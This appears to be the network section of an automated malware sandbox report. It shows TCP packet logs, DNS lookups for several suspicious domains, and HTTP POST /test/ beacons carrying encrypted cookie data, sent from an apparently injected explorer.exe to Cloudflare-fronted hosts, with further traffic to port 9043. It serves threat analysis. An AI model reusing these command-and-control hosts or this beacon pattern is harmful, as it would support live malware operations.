                                                                                                                                          Nov 13, 2024 18:23:22.888437986 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888578892 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.888645887 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888730049 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.888745070 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.888856888 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.889157057 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.889266014 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.889337063 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.901556015 CET50065443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:22.901590109 CET44350065104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.964432001 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:22.964472055 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:22.964618921 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:22.988432884 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:22.988451004 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.601006031 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.601064920 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.601608038 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.601618052 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.603106976 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.603116035 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.988975048 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.989033937 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989053011 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.989068031 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.989113092 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989113092 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989382029 CET50066443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:23.989402056 CET44350066104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.994173050 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:23.994230032 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:23.994349957 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:23.994576931 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:23.994589090 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:24.783565998 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:24.783668995 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:24.784106016 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:24.784111977 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:24.785250902 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:24.785257101 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.167884111 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.167951107 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.167963982 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.168004036 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.168427944 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.168474913 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.168478966 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.168493032 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.168539047 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.168539047 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.168593884 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.168606043 CET44350067104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.168617010 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.168646097 CET50067443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:25.193185091 CET50068443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:25.193232059 CET44350068104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:25.193619013 CET50068443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:25.193679094 CET50068443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:25.193696976 CET44350068104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:26.057557106 CET44350068104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:26.057647943 CET50068443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:37.883301973 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:37.885900974 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:37.885912895 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:38.786341906 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:38.786474943 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:38.793703079 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:38.793735981 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:38.843569040 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:38.843594074 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.402934074 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.403008938 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:39.403024912 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.403068066 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:39.403101921 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.403150082 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:39.403155088 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.403197050 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:39.403248072 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.403295994 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:39.403516054 CET50078443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:39.403529882 CET44350078104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.424489021 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:39.424532890 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:39.424608946 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:39.424813986 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:39.424828053 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.157839060 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.158051014 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.158307076 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.158318996 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.161905050 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.161917925 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.690237999 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.690335989 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.690354109 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.690479994 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.690596104 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.690654993 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.690985918 CET50079443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:40.691003084 CET44350079104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.697899103 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:40.697963953 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:40.698075056 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:40.698354959 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:40.698384047 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:41.606012106 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:41.606161118 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:41.606764078 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:41.606770992 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:41.607989073 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:41.607995033 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:42.390721083 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:42.390806913 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:42.390815973 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:42.390883923 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:42.391043901 CET50080443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:42.391058922 CET44350080104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:42.549530983 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:42.549587011 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:42.549668074 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:42.550134897 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:42.550152063 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:43.466252089 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:43.466327906 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:43.466912031 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:43.466934919 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:43.468183041 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:43.468189001 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.184659004 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.184736013 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.184791088 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:44.185596943 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:44.185679913 CET50081443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:44.185722113 CET44350081104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.190150023 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:44.190191984 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.190428972 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:44.190553904 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:44.190566063 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.811503887 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.811578035 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:44.812195063 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:44.812205076 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:44.813321114 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:44.813325882 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:45.220647097 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:45.220722914 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:45.220740080 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:45.220784903 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:45.221092939 CET50082443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:45.221112967 CET44350082104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:45.236845970 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:45.236949921 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:45.237047911 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:45.237257004 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:45.237294912 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.120349884 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.120579958 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:46.121855021 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:46.121855021 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:46.121890068 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.121941090 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.857157946 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.857232094 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.857347965 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:46.857348919 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:46.857532024 CET50083443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:46.857577085 CET44350083104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.862394094 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:46.862472057 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.862659931 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:46.862896919 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:46.862935066 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:47.622493982 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:47.721618891 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:47.721690893 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:47.722235918 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:47.722248077 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:47.723542929 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:47.723550081 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.028440952 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:48.496325016 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.496402025 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.496959925 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:48.509474039 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:48.509526014 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.518028021 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:48.518074989 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.518688917 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:48.518877029 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:48.518888950 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.715951920 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:49.135493994 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.135574102 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.143779039 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.143805981 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:03.637645960 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:03.637736082 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:03.642399073 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:03.642412901 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:03.644133091 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:03.644145012 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503483057 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503556967 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503592014 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503638029 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503644943 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503688097 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503736019 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503783941 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503905058 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503923893 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.508225918 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:04.508277893 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.508541107 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:04.508541107 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:04.508584023 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:06.448425055 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:06.448528051 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:06.919137955 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:24:17.220603943 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:24:17.226912022 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:17.227042913 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:24:21.301868916 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:21.304238081 CET50096443192.168.2.6104.21.15.162
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 13, 2024 18:20:07.662364006 CET | 62633 | 53 | 192.168.2.6 | 1.1.1.1
Nov 13, 2024 18:20:08.008101940 CET | 53 | 62633 | 1.1.1.1 | 192.168.2.6
Nov 13, 2024 18:21:01.281399012 CET | 53587 | 53 | 192.168.2.6 | 1.1.1.1
Nov 13, 2024 18:21:01.603162050 CET | 53 | 53587 | 1.1.1.1 | 192.168.2.6
Nov 13, 2024 18:21:34.585939884 CET | 62027 | 53 | 192.168.2.6 | 1.1.1.1
Nov 13, 2024 18:21:34.595989943 CET | 53 | 62027 | 1.1.1.1 | 192.168.2.6
Nov 13, 2024 18:21:35.842710972 CET | 65126 | 53 | 192.168.2.6 | 1.1.1.1
Nov 13, 2024 18:21:35.857342005 CET | 53 | 65126 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 13, 2024 18:20:07.662364006 CET | 192.168.2.6 | 1.1.1.1 | 0x7727 | Standard query (0) | burjog.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:01.281399012 CET | 192.168.2.6 | 1.1.1.1 | 0xcbc4 | Standard query (0) | samomol.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:34.585939884 CET | 192.168.2.6 | 1.1.1.1 | 0x7299 | Standard query (0) | rolefenik.com | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:35.842710972 CET | 192.168.2.6 | 1.1.1.1 | 0xa95 | Standard query (0) | ergiholim.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 13, 2024 18:20:08.008101940 CET | 1.1.1.1 | 192.168.2.6 | 0x7727 | No error (0) | burjog.com |  | 45.143.166.230 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:01.603162050 CET | 1.1.1.1 | 192.168.2.6 | 0xcbc4 | No error (0) | samomol.com |  | 87.120.37.120 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:34.595989943 CET | 1.1.1.1 | 192.168.2.6 | 0x7299 | No error (0) | rolefenik.com |  | 104.21.92.105 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:34.595989943 CET | 1.1.1.1 | 192.168.2.6 | 0x7299 | No error (0) | rolefenik.com |  | 172.67.191.232 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:35.857342005 CET | 1.1.1.1 | 192.168.2.6 | 0xa95 | No error (0) | ergiholim.com |  | 104.21.15.162 | A (IP address) | IN (0x0001) | false
Nov 13, 2024 18:21:35.857342005 CET | 1.1.1.1 | 192.168.2.6 | 0xa95 | No error (0) | ergiholim.com |  | 172.67.163.30 | A (IP address) | IN (0x0001) | false
                                                                                                                                          • rolefenik.com
                                                                                                                                          • ergiholim.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49988 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:35 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:35 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:35 UTC | 753 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J07vdHmpTbgXkpU0PT%2FSrvVfERHCS%2FTR%2Fxulfo6PY7tBjXcE4LmIrekqqblqQjd%2FwRtqQGixEER2CCRXuKpZZEiEA9ACPwRJjedptWI%2FYHMI4pHFIfEvVDC%2F5kxgjfVZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070645cb9f9ea-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41334&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=70093&cwnd=32&unsent_bytes=0&cid=ded42fc163fc42e5&ts=542&x=0"
2024-11-13 17:21:35 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:21:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49989 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:36 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:21:36 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:21:37 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4TKJqBpqaLi%2BZ5FR07Esw%2FyQ4uwxTz1tPZ6HCRDt5SHIVQon9ikKGizF0x0K9ri%2Fs1FrpG8UsojAEy%2Fv%2BxI2vvJ7ajnvkvisiOFY6v0FaAFavnbjSFlkTwTzTM1g8i2"}],"group":"cf-nel","max_age":604800}
